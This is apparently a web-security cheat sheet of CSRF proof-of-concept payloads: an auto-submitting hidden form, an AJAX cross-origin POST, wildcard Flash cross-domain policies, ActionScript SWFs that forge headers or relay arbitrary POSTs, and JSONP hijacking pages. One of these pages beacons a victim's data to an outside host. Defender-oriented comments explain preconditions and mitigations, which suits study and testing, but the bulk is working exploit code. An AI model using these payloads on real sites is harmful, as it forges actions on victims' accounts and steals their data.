Advanced CSRF

Example CSRF PoC

<html>
<!-- CSRF PoC - generated by Burp Suite Professional -->
<!-- Defender's view: this page only succeeds when the target endpoint accepts a
     plain cross-site form POST, i.e. it checks no per-session anti-CSRF token and
     the browser still attaches the victim's session cookie to the request (cookie
     without SameSite=Lax/Strict). Note the hostname "taget.com" below differs from
     the "target.com" placeholder used elsewhere on this page - presumably a typo. -->
<body>
<!-- Every field value is attacker-chosen; nothing here depends on the victim. -->
<form action="http://taget.com/modify" method="POST">
<input type="hidden" name="username" value="xl7dev" />
<input type="hidden" name="password" value="password" />
<input type="submit" value="Submit request" />
</form>
<!-- Auto-submit: the victim sees no interaction. Server side, such requests are
     recognisable by an Origin/Referer header that is absent or from a foreign site. -->
<script>
document.forms[0].submit();
</script>
</body>
</html>

AJAX CSRF

// Attempts a cross-origin POST from the victim's browser via XMLHttpRequest.
// Defender's note: the custom X-Requested-With header set below is not a
// CORS-safelisted header, so a CORS-enforcing browser first issues an OPTIONS
// preflight; unless target.com answers with Access-Control-Allow-Origin for the
// attacker's origin and Access-Control-Allow-Headers covering X-Requested-With,
// the POST is never sent at all. A server-side "X-Requested-With" check is
// therefore effective against this technique unless CORS is misconfigured.
// Also note: `xmlhttp` is assigned without `var`, so it leaks into global scope.
function csrfAjax(){
if (window.XMLHttpRequest){
xmlhttp=new XMLHttpRequest();
} else{
// Legacy Internet Explorer fallback.
xmlhttp=new ActiveXObject("Microsoft.XMLHTTP");
}
xmlhttp.onreadystatechange=function(){
// Reading the response cross-origin likewise requires a permissive CORS policy on the target.
if (xmlhttp.readyState==4 && xmlhttp.status==200){
document.getElementById("myDiv").innerHTML=xmlhttp.responseText; }
}
xmlhttp.open("POST","http://target.com/csrf.php",true);
xmlhttp.setRequestHeader("X-Requested-With", "XMLHttpRequest");
// No Content-Type is set, so the body goes out with the XHR default (text/plain), not as form data.
xmlhttp.send("query=123hacked123&primary Type=mixed&sortBy=date&intl=true");
}

Bypassing header checks via Flash

crossdomain.xml

<!-- Flash cross-domain policy served by the target. allow-access-from domain="*"
     permits a SWF loaded from ANY origin to interact with this host on the user's
     behalf; this wildcard is the misconfiguration the Flash PoC below depends on.
     A safe policy lists only specific trusted domains, or omits the file entirely. -->
<cross-domain-policy>
<allow-access-from domain="*"/>
</cross-domain-policy>

flashcsrfexp.as

// ActionScript 2 PoC: sends a cross-site request from a SWF while attempting to
// set request headers (Host, Referer) that browsers normally keep out of script control.
// Defender's note: this relies on the permissive crossdomain.xml shown above and on
// the Flash Player honouring addRequestHeader for those headers; later Flash Player
// releases refused to set such headers (TODO confirm exact versions) and Flash
// Player reached end-of-life at the end of 2020, so the vector is mostly historical.
// Either way, a Referer/Host check alone was never a robust CSRF defence - use
// per-session tokens and SameSite cookies.
class forge_headers{
function forge_headers(){

}
// `mc` (presumably the movie clip handed in by the runtime) is unused.
static function main(mc){
var req:LoadVars=new LoadVars();
// GET method
//req.addRequestHeader("Foo","Bar");
//req.addRequestHeader("Host:","www.target.com");
//req.send("http://www.target.com/csrf.php?p1=v1&p2=v2","","GET");
//req.send("http://www.target.com/csrf.php","","GET")
// POST method
req.addRequestHeader("Bar","BarFoo");
req.addRequestHeader("Referer:http://www.target.com/csrf.php","")
req.addRequestHeader("Host:","www.target.com");
// decode() turns the query string into LoadVars properties, which send() then posts as the body.
req.decode("username=xl7dev&password=pass");
req.send("http://www.target.com/csrf.php","","POST")
}
}

Usage: url=[address of the POST request]&[parameter values, separated by &]

FlashCSRFexp.swf?url=http://www.xx.xx/x.jsp?&xx=xx&xx=xx&xx=xx&xx=xx

// ActionScript 3 PoC: a SWF that relays a POST to whatever URL it is given in its
// own FlashVars. Defender's notes: the destination is entirely caller-controlled
// (the `url` parameter) and every other FlashVar becomes a POST field, so a SWF of
// this shape hosted on a site is by itself an open cross-site request relay and
// should be treated as a finding. Flash Player reached end-of-life at the end of
// 2020. Per-session anti-CSRF tokens are unaffected, since the attacker cannot
// read or guess them to include in the FlashVars.
package
{
import flash.display.Sprite;
import flash.net.URLRequest;
import flash.net.URLRequestMethod;
import flash.net.sendToURL;

public class FlashCSRFexp extends Sprite
{

// The constructor does all the work, so the request fires as soon as the SWF loads.
public function FlashCSRFexp()
{
var key:* = null;
var emailtargetURL:String = null;
var emailrequest:URLRequest = null;
var datastring:String = null;
super();
// Parameters passed to the SWF (FlashVars / embed query string).
var postdata:Object = this.loaderInfo.parameters;
var data:Array = [];
// Every parameter except "url" becomes a key=value POST field; values are not URL-encoded.
for(key in postdata)
{
if(key != "url")
{
data.push(key + "=" + postdata[key]);
}
}
// "url" selects the destination of the POST.
emailtargetURL = postdata.url;
emailrequest = new URLRequest(emailtargetURL);
emailrequest.method = URLRequestMethod.POST;
datastring = data.join("&");
emailrequest.data = datastring;
// Fire-and-forget: sendToURL does not expose the response.
sendToURL(emailrequest);
}
}
}

JSON Hijacking

<meta content="text/html; charset=utf-8" http-equiv="Content-Type" /> 
<!-- JSONP: the target endpoint wraps its JSON in the caller-supplied callback name
     and is loaded via a <script> tag, which the same-origin policy does not restrict.
     Defender's view: if json.php returns data tied to the logged-in user's cookie,
     any site can read it this way. Mitigations: do not serve per-user data over
     JSONP, require a CSRF token or Origin/Referer check on the endpoint, and mark
     the session cookie SameSite. -->
<script type="text/javascript">
// Called by the loaded script with the endpoint's data object.
function jsonpCallback(result) {
alert(result.a);
alert(result.b);
alert(result.c);
for(var i in result) {
alert(i+":"+result[i]);// loops over and outputs each pair: a:1,b:2,etc.
}
}
</script>
<!-- The callback name in the query string is what makes the response executable as script. -->
<script type="text/javascript" src="http://www.target.com/json.php?callback=jsonpCallback"></script>

PoC

<html>
<meta content="text/html; charset=utf-8" http-equiv="Content-Type" />
<!-- Same JSONP weakness as above, but the values are collected and sent off-site
     through an image request. Defender's view: in the target's logs this shows up
     as a load of services.php with an unexpected callback name, typically with a
     Referer from a foreign origin; the beacon itself is a GET to a third-party host
     carrying the data in its query string. -->
<script type="text/javascript">
function hijack(result) {
var data = '';
// Flatten every property into one string (no separator between pairs).
for(var i in result) {
data += i + ':' + result[i];
}
new Image().src = "http://blog.safebuff.com/JSONHiJacking.php?data=" + escape(data);// sends the collected data to the attacker's server
}
</script>
<script type="text/javascript" src="http://www.target.com/services.php?callback=hijack"></script>
</html>

CSRF via XSS

CSRF via XSS